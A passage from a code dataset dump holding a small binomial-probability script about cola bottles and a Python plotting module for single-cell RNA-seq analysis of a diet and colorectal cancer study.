gui\r\nwindow.mainloop()\r\n\r\nhold(isou)","repo_name":"SamuelMumford/GUIData","sub_path":"DataTakeGUI.py","file_name":"DataTakeGUI.py","file_ext":"py","file_size_in_byte":9497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32422783893","text":"from scipy.special import comb\nimport numpy as np\n\nbottles_of_cola = 10\ntotal = pow(2,bottles_of_cola)\n\ndata = []\nfor i in range(bottles_of_cola+1):\n\tdata.append(comb(bottles_of_cola,i))\npdf = np.around(np.divide(data, total),4)\ncdf = np.around(np.cumsum(pdf),3)\nprint(\"sum: {}, data: {}\".format(sum(data),data))\nprint(\"pdf: {}\".format(pdf))\nprint(\"cdf: {}%\".format(cdf))\n\n\nimport matplotlib.pyplot as plt\n# plt.plot(range(0, len(data)),data)\nplt.plot(range(0, len(data)),pdf)\nplt.plot(range(0, len(data)),cdf)\nplt.show()","repo_name":"lloyd-dong/tiger_class","sub_path":"learn_python/cola_calc.py","file_name":"cola_calc.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70508023208","text":"from cProfile import label\nfrom turtle import color\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport seaborn as sns\nfrom matplotlib import cm\nimport scanpy as sc\n# import utils\nimport numpy as np\nimport matplotlib\nimport os\nimport utils\nimport matplotlib.image as mpimg\n\n'''Plotting functions'''\n\ncond_colors = {\n 'Healthy' : '#440154FF',\n 'HF-A' : '#21908CFF',\n 'HF-CKD' : '#FDE725FF',\n}\n\nctype_colors = {\n 'adipocytes' : '#D51F26',\n 'cardiomyocyte' : '#272E6A',\n 'endothelial' : '#208A42',\n 'fibroblast' : '#89288F',\n 'lymphatic_endo' : '#F47D2B',\n 'macrophages' : '#FEE500',\n 'mast_cells' : '#8A9FD1',\n 'neuronal' : '#C06CAB',\n 'pericyte' : '#D8A767',\n 'T-cells' : '#90D5E4',\n 'vSMCs' : '#89C75F'\n}\n\ndef plot_mt_vs_counts(data, ax, mt_thr=20, fontsize=11): \n # Plot scatter\n ax.scatter(x=data.obs.total_counts, y=data.obs.pct_counts_mt, s=1, c='gray')\n ax.axhline(y=mt_thr, linestyle='--', color=\"black\")\n ax.set_xlabel(\"Total counts\", fontsize=fontsize)\n ax.set_ylabel(\"Fraction MT counts\", fontsize=fontsize)\n\n\ndef plot_rp_vs_counts(data, ax, rp_thr=None, fontsize=11): \n # Plot scatter\n ax.scatter(x=data.obs.total_counts, y=data.obs.pct_counts_rp, s=1, c='gray')\n if rp_thr:\n ax.axhline(y=rp_thr, linestyle='--', color=\"black\")\n ax.set_xlabel(\"Total counts\", fontsize=fontsize)\n ax.set_ylabel(\"Fraction RP counts\", fontsize=fontsize)\n\n\ndef plot_ngenes_vs_counts(data, ax, gene_thr=6000, fontsize=11):\n # Plot scatter\n ax.scatter(x=data.obs.total_counts, y=data.obs.n_genes_by_counts, s=1, c='gray')\n ax.axhline(y=gene_thr, linestyle='--', color=\"black\")\n ax.set_xlabel(\"Total counts\", fontsize=fontsize)\n ax.set_ylabel(\"Number of genes expr\", fontsize=fontsize)\n\n\ndef plot_doublet_scores(data, ax, doublet_thr=0.2, fontsize=11):\n # Plot histogram\n ax.hist(data.obs.doublet_score, bins=100, color='gray')\n ax.axvline(x=doublet_thr, linestyle='--', color=\"black\")\n ax.set_xlabel('Droplet score distribution', fontsize=fontsize)\n \n\ndef plot_diss_scores(data, ax, diss_thr=0.5, fontsize=11):\n # Plot histogram\n ax.hist(data.diss_score, bins=100, color='gray')\n ax.axvline(x=diss_thr, linestyle='--', color=\"black\")\n ax.set_xlabel('Dissociation score distribution', fontsize=fontsize)\n\n\ndef plot_ncell_diff(data, ax, labels, n_rem, fontsize=11):\n # Plot Barplot\n for label, n in zip(labels, n_rem):\n ax.bar(label, n)\n ax.set_title('Cells removed per filter', fontsize=fontsize)\n ax.tick_params(axis='x', rotation=45)\n \ndef plot_cell_type_proportion(cond_list, cond_name =\"Immune\", adata=None, obs_col = \"cell_type_0.20\", sample_type=\"sc\"):\n input_path = \"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_integrated_cluster_scannot.h5ad\"\n sample_type=\"sc\"\n adata = sc.read_h5ad(input_path)\n meta = utils.get_meta_data(sample_type)\n condition = list(np.unique(meta['condition']))\n c_type_list = list(adata.obs[obs_col].cat.categories)\n\n # CD-AOM-DSS-Epi_plus_DN,LFD-AOM-DSS-Epi_plus_DN,HFD-AOM-DSS-Epi_plus_DN\n # CD-AOM-DSS-Immune,LFD-AOM-DSS-Immune,HFD-AOM-DSS-Immune\n cond_list = cond_list.split(\",\")\n # cond_list = [\"CD-AOM-DSS-Immune\", \"LFD-AOM-DSS-Immune\", \"HFD-AOM-DSS-Immune\"]\n # cond_list = [\"CD-AOM-DSS-Epi_plus_DN\", \"LFD-AOM-DSS-Epi_plus_DN\", \"HFD-AOM-DSS-Epi_plus_DN\"]\n cond_prop = dict()\n cond_arr = []\n for cond in cond_list:\n cond_arr.append([])\n # print(cond, cond_arr)\n cond_prop[cond] = []\n adata_tmp = adata[adata.obs[\"condition\"]==cond,:]\n # print(adata_tmp.shape)\n sum = 0\n for c_type in c_type_list:\n print(\"c_type\", c_type, adata_tmp[adata_tmp.obs[obs_col]==c_type].shape)\n cond_arr[-1].append(100*(adata_tmp[adata_tmp.obs[obs_col]==c_type].shape[0]/adata_tmp.shape[0]))\n #cond_prop[cond][c_type] = adata_tmp.obs[\"cell_type_0.20\"].str.count(c_type).sum()/adata_tmp.shape[0]\n # cond_prop[cond][c_type] = adata_tmp.obs[\"cell_type_0.20\"].str.count(c_type).sum()/adata_tmp.shape[0]\n #sum += adata_tmp.obs[\"cell_type_0.20\"].str.count(c_type).sum()\n\n data = np.array(cond_arr).T\n\n fig, ax1 = plt.subplots(figsize=(10, 6))\n\n # For loop for creating stacked bar chart\n cmap = matplotlib.cm.get_cmap('tab20')\n\n X = np.arange(data.shape[1])\n for i in range(data.shape[0]):\n ax1.bar(X, data[i],bottom = np.sum(data[:i], \n axis =0), width= 0.85, color = cmap.colors[i], label=c_type_list[i] )\n\n ax1.set_xticks([0,1,2])\n ax1.set_xticklabels(cond_list) # , rotation=45)\n ax1.set_xlabel(\"Condition\", fontweight='bold')\n ax1.set_ylabel(\"Proportion (%)\", fontweight='bold')\n ax1.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n plt.subplots_adjust(bottom=0.45)\n fig.tight_layout()\n plt.savefig(f\"../plots/sc_cell_type_annot/major_cell_type_prop_{cond_name}_barplot.pdf\")\n\n fig, axs = plt.subplots(5, 4, figsize=[15, 15])\n \n for ind, c_t in enumerate(c_type_list):\n fig_row, fig_col = int(ind/4), ind%4\n axs[fig_row][fig_col].plot(cond_list, data[ind,:], marker='o', mec = 'grey', mfc = 'grey', markersize=12, linewidth=5, color=cmap.colors[ind], label=c_t)\n axs[fig_row][fig_col].set_title(c_t)\n axs[fig_row][fig_col].set_xticklabels([\"CD\", \"LFD\", \"HFD\"])\n axs[fig_row][fig_col].tick_params(axis='y', which='major', labelsize=8)\n\n \n plt.subplots_adjust(bottom=0.45)\n fig.supxlabel('Condition', fontweight='bold')\n fig.supylabel('Proportion (%)', fontweight='bold')\n fig.tight_layout()\n \n fig.delaxes(axs[4][3])\n fig.delaxes(axs[4][2])\n fig.delaxes(axs[4][1])\n plt.savefig(f\"../plots/sc_cell_type_annot/majorcell_type_prop_{cond_name}_line.pdf\")\n\n\n\n# plot_cell_type_proportion(\"CD-AOM-DSS-Epi_plus_DN,LFD-AOM-DSS-Epi_plus_DN,HFD-AOM-DSS-Epi_plus_DN\", cond_name =\"epithelial\", adata=None, obs_col = \"major_cell_types\", sample_type=\"sc\")\n# plot_cell_type_proportion(\"CD-AOM-DSS-Immune,LFD-AOM-DSS-Immune,HFD-AOM-DSS-Immune\", cond_name =\"immune\", adata=None, obs_col = \"major_cell_types\", sample_type=\"sc\")\n\n\ndef plot_ngene_diff(adata, ax, fontsize=11):\n ax.set_title('Num genes filtered', fontsize=fontsize)\n ax.bar(x=\"Before\", height=adata.uns['hvg']['ngene'])\n ax.bar(x=\"After\", height=adata.shape[1])\n \n \ndef plot_hvg_nbatches(data, ax, fontsize=11):\n for nbatches in np.flip(np.unique(data.highly_variable_nbatches)):\n num = data[data.highly_variable_nbatches == nbatches].shape[0]\n ax.bar(str(nbatches), num, color=\"gray\")\n ax.set_title('Num shared HVG by num samples',fontsize=fontsize)\n \n \ndef plot_sorted_rank(data, col, ax, fontsize=11):\n xdim = np.arange(len(data))\n ysort = np.flip(np.sort(data[col]))\n ax.set_title('Ranked {0}'.format(col), fontsize=fontsize)\n ax.plot(xdim, ysort, c='grey')\n\n \ndef stacked_barplot(data, feature_name, ax, cmap=cm.tab20):\n # cell type names\n type_names = data.var.index\n levels = pd.unique(data.obs[feature_name])\n n_levels = len(levels)\n feature_totals = np.zeros([n_levels, data.X.shape[1]])\n\n for level in range(n_levels):\n l_indices = np.where(data.obs[feature_name] == levels[level])\n feature_totals[level] = np.sum(data.X[l_indices], axis=0)\n \n y = feature_totals\n title=feature_name\n level_names=levels\n \n n_bars, n_types = y.shape\n r = np.array(range(n_bars))\n sample_sums = np.sum(y, axis=1)\n\n barwidth = 0.85\n cum_bars = np.zeros(n_bars)\n\n for n in range(n_types):\n bars = [i / j * 100 for i, j in zip([y[k][n] for k in range(n_bars)], sample_sums)]\n ax.bar(r, bars, bottom=cum_bars, color=cmap(n % cmap.N), width=barwidth, label=type_names[n], linewidth=0)\n cum_bars += bars\n ax.set_title(title)\n ax.legend(loc='upper left', bbox_to_anchor=(1, 1), ncol=1)\n ax.set_xticks(r)\n ax.set_xticklabels(level_names, rotation=45)\n ax.set_ylabel(\"Proportion\")\n\ndef volcano(name, lfc, pvals, ax, max_num=None,\n lfc_thr=0.5, p_thr=0.05, s=10, fontsize=12):\n '''Volcano plot from a list of lfc and untrasnformed pvalues'''\n\n if max_num is None:\n max_num=np.max(np.abs(lfc))\n \n # Transform pvals\n pvals = -np.log10(pvals)\n \n # Mask significant genes\n msk = (pvals > -np.log10(p_thr)) & (np.abs(lfc) > lfc_thr)\n \n # Plot scatter\n ax.set_title(name)\n ax.scatter(lfc[~msk], pvals[~msk], c='gray', s=s)\n ax.scatter(lfc[msk], pvals[msk], c='red', s=s)\n ax.set_xlim(-max_num, max_num)\n ax.set_xlabel('LogFC', fontsize=fontsize)\n ax.set_ylabel('-log10(pvalue)', fontsize=fontsize)\n ax.set_box_aspect(1)\n \ndef dotplot(title, x, y, c, s, size_title, color_title, cmap='coolwarm', edgecolor=None, num=30, fontsize=9, figsize=(12,6)):\n # Define figure\n fig, ax = plt.subplots(1,1, dpi=150, figsize=figsize)\n ax.set_title(title, fontsize=fontsize+5)\n \n # Add grid and set it to background\n ax.grid(True)\n ax.set_axisbelow(True)\n \n # Dot plot\n max_num = np.max(np.abs(c))\n scatter = ax.scatter(\n x=x,\n y=y,\n c=c,\n s=s * num,\n cmap=cmap,\n vmax=max_num,\n vmin=-max_num,\n edgecolor=edgecolor\n )\n \n # Format dot plot ticks\n ax.tick_params(axis='x', rotation=90, labelsize=fontsize)\n ax.tick_params(axis='y', labelsize=fontsize)\n ax.margins(y=0.05)\n\n # Plot pvalue dot sizes legend\n handles, labels = scatter.legend_elements(\"sizes\", num=4)\n labels = ['$\\\\mathdefault{'+'{0}'.format(int(int(label.split('{')[1].split('}')[0])/num))+'}$' for label in labels]\n\n ax.legend(handles, labels, loc=\"upper left\", bbox_to_anchor=(1,1), frameon=False, title=size_title)\n \n # Add color bar\n cax = fig.add_axes([0.945, 0.25, 0.025, 0.35])\n cbar = fig.colorbar(scatter, cax=cax, orientation='vertical')\n cbar.ax.set_title(color_title)\n \n # Format figure\n fig.tight_layout()\n fig.set_facecolor('white')\n \n return fig\n\ndef plot_ora(name, df, ax, top=10, fontsize=11):\n df = df.sort_values('adj_pvalues', ascending=True).head(top)\n names = np.flip(df['descr'].tolist())\n pvals = np.flip(-np.log10(df['adj_pvalues']))\n ax.barh(names, pvals, color='gray')\n ax.axvline(x=-np.log10(0.05), c='black', ls='--')\n ax.set_xlabel('-log10(adj_pval)', fontsize=fontsize)\n ax.set_title(name, fontsize=fontsize)\n \ndef corr(name, x, y, ax, fontsize=11):\n from scipy import stats\n corr, _ = stats.spearmanr(x, y)\n ax.scatter(x, y, c='gray', s=5)\n ax.set_title('{0} | corr: {1}'.format(name, '{:.2f}'.format(corr)), fontsize=fontsize)\n \ndef violins(arr, meta, ax):\n data = arr.copy()\n data[data==0] = np.nan\n sns.violinplot(x=data.melt().variable, \n y=np.log2(data.melt().value), \n hue=meta.loc[data.melt().variable].condition.values)\n\n\n# def plot_qc_after_filtering(sample_type):\ndef show_plot(plt_path, text=None):\n img = mpimg.imread(plt_path)\n plt.imshow(img)\n\ndef show_qc_filtering_plot(plot_fold_path, sample_type):\n meta = utils.get_meta_data(sample_type)\n\n for _, row in meta.iterrows():\n sample_id = row[\"sample_id\"]\n\n print(\"QC metrics...\")\n show_plot(os.path.join(plot_fold_path, f\"{sample_type}_qc_preprocess\", f\"basic_stats_before_filtering_{sample_id}.pdf\"))\n print(\"Plotting highest expressed genes after QC and filtering...\")\n show_plot(os.path.join(plot_fold_path, f\"{sample_type}_qc_preprocess\", f\"highest_expr_genesbasic_stats_after_filtering_{sample_id}.pdf\"))\n\ndef plot_clusters(adata):\n plt.rcParams['figure.dpi']= 300\n plt.rcParams['figure.figsize']= (45, 30)\n for cat_n in adata.obs['leiden_0.40'].cat.categories:\n cat_n = int(cat_n)\n adata.obs['cluster_dummy'] = adata.obs['leiden_0.40'] == adata.obs['leiden_0.40'].cat.categories[cat_n]\n adata.obs[\"cluster_dummy\"] = adata.obs['cluster_dummy'].astype(str).astype('category')\n sc.pl.umap(adata, color='cluster_dummy', size=10, title=f\"Cluster {cat_n}\", save=f\"atlas_cluster_{cat_n}\")\n\n\"\"\" adata.obs['cluster_dummy'] = adata.obs['leiden_0.40'] == adata.obs['leiden_0.40'].cat.categories[1]\n adata.obs[\"cluster_dummy\"] = adata.obs['cluster_dummy'].astype(str).astype('category')\n sc.pl.umap(adata, color='cluster_dummy', size=10, title=\"Cluster 0\", save=f\"atlas_cluster_1\")\"\"\"\n\n\n# the functions for adding stat. sig. plots are coming from here\n# https://stackoverflow.com/questions/11517986/indicating-the-statistically-significant-difference-in-bar-graph\n\n\n# This plotting function comes from the answer in the following link\n# https://stackoverflow.com/questions/11517986/indicating-the-statistically-significant-difference-in-bar-graph\ndef barplot_annotate_brackets(num1, num2, data, center, height, yerr=None, dh=.05, barh=.05, fs=None, maxasterix=None):\n \"\"\" \n Annotate barplot with p-values.\n\n :param num1: number of left bar to put bracket over\n :param num2: number of right bar to put bracket over\n :param data: string to write or number for generating asterixes\n :param center: centers of all bars (like plt.bar() input)\n :param height: heights of all bars (like plt.bar() input)\n :param yerr: yerrs of all bars (like plt.bar() input)\n :param dh: height offset over bar / bar + yerr in axes coordinates (0 to 1)\n :param barh: bar height in axes coordinates (0 to 1)\n :param fs: font size\n :param maxasterix: maximum number of asterixes to write (for very small p-values)\n \"\"\"\n\n if type(data) is str:\n text = data\n else:\n # * is p < 0.05\n # ** is p < 0.005\n # *** is p < 0.0005\n # etc.\n text = ''\n p = .05\n\n while data < p:\n text += '*'\n p /= 10.\n\n if maxasterix and len(text) == maxasterix:\n break\n\n if len(text) == 0:\n text = 'n. s.'\n\n lx, ly = center[num1], height[num1]\n rx, ry = center[num2], height[num2]\n\n if yerr:\n ly += yerr[num1]\n ry += yerr[num2]\n\n ax_y0, ax_y1 = plt.gca().get_ylim()\n dh *= (ax_y1 - ax_y0)\n barh *= (ax_y1 - ax_y0)\n\n y = max(ly, ry) + dh\n\n barx = [lx, lx, rx, rx]\n bary = [y, y+barh, y+barh, y]\n mid = ((lx+rx)/2, y+barh)\n\n plt.plot(barx, bary, c='black')\n\n kwargs = dict(ha='center', va='bottom')\n if fs is not None:\n kwargs['fontsize'] = fs\n\n plt.text(*mid, text, **kwargs)\n\n\ndef test_significance():\n heights = [1.8, 2, 3]\n bars = np.arange(len(heights))\n\n plt.figure()\n plt.bar(bars, heights, align='center')\n plt.ylim(0, 5)\n barplot_annotate_brackets(0, 1, .1, bars, heights)\n barplot_annotate_brackets(1, 2, .001, bars, heights)\n barplot_annotate_brackets(0, 2, 'p < 0.0075', bars, heights, dh=.2)\n plt.savefig(\"test_sig.pdf\")\n\n\n\n\n# Custom function to draw the diff bars\n\ndef label_diff(i,j,text,X,Y, ax):\n x = (X[i]+X[j])/2\n print(Y[i], Y[j])\n\n y = max(Y[i], Y[j])\n \n print(y)\n dx = abs(X[i]-X[j])\n\n props = {'connectionstyle':'bar','arrowstyle':'-',\\\n 'shrinkA':5,'shrinkB':5,'linewidth':2}\n\n ax.annotate(text, xy=(x,y), zorder=10, ha='center', fontsize=15)\n ax.annotate('', xy=(X[i],y), xytext=(X[j],y), arrowprops=props)\n \n\n\n\ndef plot_significance(first_label, second_label, third_label, first_prop, second_prop, third_prop, first_second_p_val, second_third_p_val, first_third_pval, c_type, fl_name):\n proportions = (first_prop, second_prop, third_prop)\n # print(proportions, max(proportions))\n ind = np.arange(3) # the x locations for the groups\n width= 0.7\n labels = (first_label, second_label, third_label)\n\n # Pull the formatting out here\n bar_kwargs = {'width':width,'color':'y','linewidth':2,'zorder':5}\n err_kwargs = {'zorder':0,'fmt':None,'linewidth':2,'ecolor':'k'} #for matplotlib >= v1.4 use 'fmt':'none' instead\n plt.rcParams['figure.dpi']= 300\n plt.rcParams['figure.figsize']= (15, 10)\n\n fig, ax = plt.subplots()\n ax.p1 = plt.bar(ind, proportions, **bar_kwargs)\n # ax.errs = plt.errorbar(ind, menMeans, yerr=menStd, **err_kwargs)\n # Call the function\n label_diff(0,1,f'{first_second_p_val}',ind,proportions, ax)\n label_diff(1,2,f'{second_third_p_val}',ind,proportions, ax)\n label_diff(0,2,f'{first_third_pval}',ind,proportions, ax)\n # ax.set_ylim(max(proportions)+ max(proportions)*0.20)\n\n ax.set_ylim([0.0, (max(proportions)+ max(proportions)*0.30)])\n ax.set_title(f'Cell Type Proportion: {c_type}')\n ax.set_xlabel('Condition', fontsize=20)\n ax.set_ylabel('Proportion (%)', fontsize=20)\n ax.spines[['right', 'top']].set_visible(False)\n\n\n\n \n plt.xticks(ind, labels, color='k')\n plt.savefig(f\"../plots/sc_cell_type_prop/{fl_name}_{c_type}.pdf\")\n plt.savefig(f\"../plots/sc_cell_type_prop/{fl_name}_{c_type}.png\")\n\n\ndef deg_venn_diagram(sign_thr=0.05, lFCs_thr=0.5, topn=50):\n from matplotlib_venn import venn3\n\n df_hfd_vs_cd = pd.read_csv(\"../data/analysis/condition_HFD-AOM-DSS-Immune_vs_CD-AOM-DSS-Immune_deg.csv\")\n df_lfd_vs_cd = pd.read_csv(\"../data/analysis/condition_LFD-AOM-DSS-Immune_vs_CD-AOM-DSS-Immune_deg.csv\")\n df_lfd_vs_hfd = pd.read_csv(\"../data/analysis/condition_LFD-AOM-DSS-Immune_vs_HFD-AOM-DSS-Immune_deg.csv\")\n\n\n \"\"\"df_hfd_vs_cd = pd.read_csv(\"../data/analysis/condition_HFD-AOM-DSS-Immune_vs_CD-AOM-DSS-Immune_before_shrink_deg.csv\")\n df_lfd_vs_cd = pd.read_csv(\"../data/analysis/condition_LFD-AOM-DSS-Immune_vs_CD-AOM-DSS-Immune_before_shrink_deg.csv\")\n df_lfd_vs_hfd = pd.read_csv(\"../data/analysis/condition_LFD-AOM-DSS-Immune_vs_HFD-AOM-DSS-Immune_before_shrink_deg.csv\")\"\"\"\n\n df_hfd_vs_cd_mask_upreg = (df_hfd_vs_cd['log2FoldChange'] >= lFCs_thr) & (df_hfd_vs_cd['padj'] <= sign_thr)\n df_hfd_vs_cd_mask_downreg = (df_hfd_vs_cd['log2FoldChange'] <= -lFCs_thr) & (df_hfd_vs_cd['padj'] <= sign_thr)\n set_hfd_vs_cd_mask_upreg= set(df_hfd_vs_cd[df_hfd_vs_cd_mask_upreg].sort_values('padj', ascending=True).iloc[:topn][\"Unnamed: 0\"])\n set_hfd_vs_cd_mask_downreg= set(df_hfd_vs_cd[df_hfd_vs_cd_mask_downreg].sort_values('padj', ascending=True).iloc[:topn][\"Unnamed: 0\"])\n\n df_lfd_vs_cd_mask_upreg = (df_lfd_vs_cd['log2FoldChange'] >= lFCs_thr) & (df_lfd_vs_cd['padj'] <= sign_thr)\n df_lfd_vs_cd_mask_downreg = (df_lfd_vs_cd['log2FoldChange'] <= -lFCs_thr) & (df_lfd_vs_cd['padj'] <=sign_thr)\n set_lfd_vs_cd_mask_upreg= set(df_lfd_vs_cd[df_lfd_vs_cd_mask_upreg].sort_values('padj', ascending=True).iloc[:topn][\"Unnamed: 0\"])\n set_lfd_vs_cd_mask_downreg= set(df_lfd_vs_cd[df_lfd_vs_cd_mask_downreg].sort_values('padj', ascending=True).iloc[:topn][\"Unnamed: 0\"])\n\n df_lfd_vs_hfd_mask_upreg = (df_lfd_vs_hfd['log2FoldChange'] >= lFCs_thr) & (df_lfd_vs_hfd['padj'] <= sign_thr)\n df_lfd_vs_hfd_mask_downreg = (df_lfd_vs_hfd['log2FoldChange'] <= -lFCs_thr) & (df_lfd_vs_hfd['padj'] <= sign_thr)\n set_lfd_vs_hfd_mask_upreg= set(df_lfd_vs_hfd[df_lfd_vs_hfd_mask_upreg].sort_values('padj', ascending=True).iloc[:topn][\"Unnamed: 0\"])\n set_lfd_vs_hfd_mask_downreg= set(df_lfd_vs_hfd[df_lfd_vs_hfd_mask_downreg].sort_values('padj', ascending=True).iloc[:topn][\"Unnamed: 0\"])\n\n # venn3([set_hfd_vs_cd_mask_upreg.union(set_hfd_vs_cd_mask_downreg), set_lfd_vs_cd_mask_upreg.union(set_lfd_vs_cd_mask_downreg), set_lfd_vs_hfd_mask_upreg.union(set_lfd_vs_hfd_mask_downreg)], ('HFD vs. CD', 'LFD vs. CD', 'LFD vs. HFD'))\n venn3([set_hfd_vs_cd_mask_upreg, set_lfd_vs_cd_mask_upreg, set_lfd_vs_hfd_mask_upreg], ('HFD vs. CD', 'LFD vs. CD', 'LFD vs. HFD'))\n\n \n plt.show()\n venn3([set_hfd_vs_cd_mask_downreg, set_lfd_vs_cd_mask_downreg, set_lfd_vs_hfd_mask_downreg], ('HFD vs. CD', 'LFD vs. CD', 'LFD vs. HFD'))\n\n plt.show()\n\n# deg_venn_diagram()\n\ndef plot_custom_corr_heatmap():\n # colocalization analysis performed based on https://www.nature.com/articles/s41467-021-21892-z#Sec8\n sample_type = \"visium\"\n meta = utils.get_meta_data(sample_type)\n ref_ct= \"B cells-1\"\n cell_types = [\"IgA plasma cells-1\", \"Neutrophils\"]\n str_cell_types = \"_\".join(cell_types)\n lst_corr = []\n lst_cond = []\n dict_colocalization = dict()\n for ind, row in meta.iterrows():\n lst_cell_types = []\n sample_id = row[\"sample_id\"]\n condition = row[\"condition\"]\n df_abundance = pd.read_csv(f\"../data/out_data/cell2location_map/cell_type_abundances_{sample_id}_filtered_deconv_15_20.csv\", index_col=0)\n for ct in df_abundance.columns:\n ct = ct.split(\"_\")[-1]\n lst_cell_types.append(ct)\n df_abundance.columns = lst_cell_types\n \n corr = df_abundance.corr(method='pearson', min_periods=1)\n # print(corr)\n lst_cond.append(condition)\n lst_corr.append(list(corr[cell_types].loc[[ref_ct]].values[0]))\n\n pd_results = pd.DataFrame(lst_corr, columns=cell_types, index=lst_cond)\n print(pd_results)\n \n dict_cell_type =dict()\n\n for c_t in cell_types:\n dict_cell_type[c_t] = []\n\n\n for ind, row in pd_results.iterrows():\n diet = ind.split(\"-\")[0]\n \n for c_t in cell_types:\n \n if \"no-AOM-DSS\" in ind:\n dict_cell_type[c_t].append([\"no-AOM-DSS\", diet, row[c_t]])\n else:\n dict_cell_type[c_t].append([\"AOM-DSS\", diet, row[c_t]])\n\n print(dict_cell_type)\n\n for c_t in cell_types:\n print(c_t)\n df = pd.DataFrame(dict_cell_type[c_t], columns=['Group', \"Diet\", \"Score\"])\n print(df)\n # plot with seaborn barplot\n sns.barplot(data=df, x='Diet', y='Score', hue='Group').set(title=f'{ref_ct} vs. {c_t}')\n plt.tight_layout()\n plt.rcParams['figure.dpi']= 300\n plt.rcParams['figure.figsize']= (240, 120)\n plt.savefig(f\"../plots/vis_deconvolution/barplot_{ref_ct}_vs_{c_t}.pdf\")\n plt.clf()\n \n pd_results = pd_results.transpose()\n # print(pd_results)\n # cmap = sns.diverging_palette(230, 20, as_cmap=True)\n sns.heatmap(pd_results, annot=False, xticklabels=True, yticklabels=True)\n plt.tight_layout()\n plt.rcParams['figure.dpi']= 300\n plt.rcParams['figure.figsize']= (240, 120)\n plt.savefig(f\"../plots/vis_deconvolution/heatmap_{ref_ct}_vs_{str_cell_types}.pdf\")\n plt.close()\n\n\n\n\n# plot_custom_corr_heatmap()\n\ndef plot_dotplot_tumor_markers_vs_conditions():\n adata_integ_clust = sc.read_h5ad(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_integrated_clustered.h5ad\")\n df_over_threshold = pd.read_csv(f\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_tumor_markers_combined_thr_5.csv\")\n \n adata = utils.get_filtered_concat_data(\"sc_epicells\")\n adata = adata[adata_integ_clust.obs_names,:]\n adata.obs[\"leiden_0.20\"] = adata_integ_clust.obs[\"leiden_0.20\"]\n sc.pp.normalize_total(adata, target_sum=1e6)\n sc.pp.log1p(adata)\n print(df_over_threshold[\"Over threshold\"].values)\n adata.obs[\"tumor_markers\"] = df_over_threshold[\"Over threshold\"].values\n # adata = adata[adata.obs[\"tumor_markers\"]==1,:]\n # filter out the cells missing in adata_integ_clust\n # \n # print(adata[adata.obs[\"tumor_markers\"].isin([1]),:])\n \n print(adata)\n adata.var.index = pd.Index(gen.upper() for gen in adata.var.index.values)\n # markers = [\"WIF1\", \"AXIN2\", \"NKD1\", \"NOTUM\", \"MMP7\", \"PROX1\", \"SOX4\"]\n markers = [\"WIF1\", \"NKD1\", \"NOTUM\", \"MMP7\", \"PROX1\"]\n # sc.pl.dotplot(adata, markers, groupby='condition', standard_scale='group', dendrogram=False, show=False)\n # sc.pl.dotplot(adata, markers, groupby='condition', standard_scale='var', dendrogram=False, show=False)\n sc.pl.dotplot(adata, markers, groupby='condition', dendrogram=True, show=False, save=\"epicells_tumor_markers_no-AXIN1-no-SOX4.pdf\")\n sc.pl.dotplot(adata, markers, groupby='condition', standard_scale='var', dendrogram=True, show=False, save=\"epicells_tumor_markers_ss_var-no-AXIN1-no-SOX4.pdf\")\n sc.pl.dotplot(adata, markers, groupby='condition', standard_scale='group', dendrogram=True, show=False, save=\"epicells_tumor_markers_ss_group-no-AXIN1-no-SOX4.pdf\")\n \"\"\"sc.pl.dotplot(adata, markers, groupby='condition', dendrogram=True, show=False, save=\"epicells_tumor_markers.pdf\")\n sc.pl.dotplot(adata, markers, groupby='condition', standard_scale='var', dendrogram=True, show=False, save=\"epicells_tumor_markers_ss_var.pdf\")\n sc.pl.dotplot(adata, markers, groupby='condition', standard_scale='group', dendrogram=True, show=False, save=\"epicells_tumor_markers_ss_group.pdf\")\"\"\"\n # plt.tight_layout()\n # plt.savefig(\"../plots/sc_epi_cells_aom_noaom_visualize_markers/dot_plot.pdf\")\n \n# plot_dotplot_tumor_markers_vs_conditions()\n\n\ndef plot_dotplot_tumor_markers_vs_individual_condition(condition, group_by):\n # adata_integ_clust = sc.read_h5ad(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_aom_noaom_integrated_clustered.h5ad\")\n adata_integ_clust = sc.read_h5ad(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_aom_noaom_concatenated_celltype_annot.h5ad\")\n adata = utils.get_filtered_concat_data(\"sc_epicells_aom_noaom\")\n adata_integ_clust = adata_integ_clust[adata_integ_clust.obs[\"condition\"]==condition,:]\n adata = adata[adata_integ_clust.obs_names,:]\n adata.obs[group_by] = adata_integ_clust.obs[group_by]\n adata_integ_clust.obs[\"condition\"][condition] = condition.split(\"_\")[0]\n condition = condition.split(\"_\")[0]\n\n sc.pp.normalize_total(adata, target_sum=1e6)\n sc.pp.log1p(adata)\n adata_integ_clust.var.index = pd.Index(gen.upper() for gen in adata_integ_clust.var.index.values)\n adata.var.index = pd.Index(gen.upper() for gen in adata.var.index.values)\n # markers = [\"EPCAM\", \"CDH1\", \"MUC3\", \"CDHR5\", \"WNT6\", \"WNT10A\", \"FZD10\", \"DKK3\", \"WIF1\", \"NKD1\", \"AXIN2\", \"NOTUM\", \"SOX4\", \"PROX1\", \"MUC2\", \"REG4\", \"CCL9\", \"MMP7\", \"IFITM3\"]\n markers = [ \"EPCAM\", \"CDH1\", \"CDHR5\", \"MUC3\", \"MUC2\", \"REG4\", \"AXIN2\", \"SOX4\", \"IFITM3\", \"WNT6\", \"WNT10A\", \"FZD10\", \"DKK3\", \"WIF1\", \"NKD1\", \"NOTUM\", \"PROX1\", \"MMP7\"]\n # markers = [\"EPCAM\", \"MUC3\", \"CDHR5\", \"WNT6\", \"WNT10A\", \"DKK3\", \"WIF1\", \"NKD1\", \"NOTUM\", \"SOX4\", \"PROX1\", \"MUC2\", \"REG4\", \"CCL9\", \"MMP7\", \"IFITM3\"]\n\n sc.pl.dotplot(adata, markers, groupby=group_by, dendrogram=False, vmax=10, show=False, save=f\"epicells_{condition}.pdf\")\n # 